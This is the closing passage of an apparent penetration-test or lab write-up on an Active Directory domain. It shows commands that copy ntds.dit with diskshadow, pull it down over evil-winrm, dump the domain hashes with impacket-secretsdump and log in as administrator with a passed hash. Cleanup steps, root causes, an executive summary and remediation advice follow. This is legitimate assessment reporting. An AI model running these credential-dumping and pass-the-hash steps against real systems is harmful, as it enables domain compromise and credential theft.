unix2dos copyNTDS.cmd

# Commands run on the backup-svc shell
diskshadow /s copyScript.txt

# Transfer ntds.dit to local machine using evil-winrm
download ntds.dit
```

Once the tester had the correct files, the hashes were dumped and used to log in as the administrator.

```bash
# Command
impacket-secretsdump -ntds ntds.dit -system SYSTEM.hive LOCAL
```

<figure><img src="/files/vQxHk792sOPQPNk25ycs" alt=""><figcaption></figcaption></figure>

```bash
# Command
proxychains -q evil-winrm -i 172.16.249.200 -u administrator -H <hash>
```

<figure><img src="/files/WpigBNRCBTo2pygDbWi9" alt=""><figcaption></figcaption></figure>

### Clean up

* Reset the virtual disks

```bash
## shadowreset.txt
delete shadows all
reset
exit

# Ensure correct format
unix2dos shadowreset.txt

# Upload using evil-winrm
upload shadowreset.txt

# Run diskshadow
diskshadow /s shadowreset.txt
```

* Remove created files

```bash
# host VDESKTOP3: 10.13.38.12
rmdir /S /Q C:\Users\Public\temp

# host DC: 172.16.249.200
Remove-Item C:\Users\backup-svc\Documents\temp -Recurse
```

### Root cause

* User training - users clicked phishing link and logged into fake login page.
  * No multi-factor authentication for the Citrix Portal.
* AlwaysInstallElevated policy enabled - a standard user can install MSI packages as SYSTEM.
* Kerberoastable user - user with MSSQLSvc SPN.
* Insecure password policy / user training.
  * TGS-REP hash cracked.
  * private.ppk / ssh-rsa key cracked.
  * password reuse - service accounts with same password across the whole domain.
* Insecure cleartext protocols.
  * HTTP - user password captured.
  * LDAP - service account password captured.

### Executive Summary

In the recent comprehensive security assessment, several critical vulnerabilities have been identified within the organisation's infrastructure that require immediate attention. These vulnerabilities stem from various root causes, each posing a significant threat to the confidentiality, integrity, and availability of information and assets.

1. **Lack of User Training Against Phishing:** A significant vulnerability stems from inadequate user training regarding phishing threats. Users have fallen victim to phishing attacks by clicking on malicious links and providing their credentials on fake login pages. Additionally, the absence of multi-factor authentication increases the risk of unauthorised access.
2. **User With Privileged Permissions:** The presence of normal users with elevated privilege permissions exposes the organisation to privilege escalation attacks. Malicious actors can exploit this vulnerability to gain unauthorised access and control over critical systems.
3. **Normal Users With Service Principal Names (SPNs):** The existence of users with SPNs that are no longer in use increases the risk of Kerberoasting attacks, which can lead to the compromise of Active Directory credentials.
4. **Weak Password Policies:** Insecure password policies and password reuse practices can lead to severe security weaknesses. Short and easily guessable passwords can be cracked easily and lead to unauthorised access. Additionally, the reuse of passwords heightens the risk of lateral movement by attackers.
5. **Insecure Cleartext Protocols:** Cleartext protocols provide no encryption, so sensitive information such as usernames and passwords crosses the network readable by anyone able to capture it, which is a breach of confidentiality. An attacker with access to the network can eavesdrop on the traffic and retrieve valid accounts, which can in turn be used to gain unauthorised access to services.

In conclusion, the assessment has unveiled critical vulnerabilities within the organisation's security framework. Addressing these root causes requires a holistic approach, encompassing user education, privilege management, enhanced password policies, and secure communication protocols. By promptly implementing the recommended measures, it will significantly enhance the security posture, safeguard sensitive information, and fortify the resilience against evolving cyber threats.

### Recommendation

* Review and minimise the usage of SPN accounts that are no longer in use.
  * Remove the MSSQLSvc if it's no longer required.
* Use secure protocols to protect against malicious users eavesdropping on the traffic.
  * Switch HTTP to HTTPS
  * Switch LDAP to LDAPS
  * Encrypt sensitive information in transit.
* Employ multi-factor authentication within the organisation, starting with critical systems like the Citrix Portal.
* Implementing regular and comprehensive security awareness training for all users so that phishing emails can be spotted and reported.
* Adjusting user permissions to adhere to the principle of least privilege, restricting unnecessary administrative access to prevent privilege escalation attacks.
  * Disable the 'AlwaysInstallElevated' policy (set to 0 or not configured under both HKLM and HKCU) and audit Group Policy for it.
* Implement strong password policies
  * It is recommended to implement a password manager.
  * Encourage unique passwords.
  * Strictly prohibit password reuse.

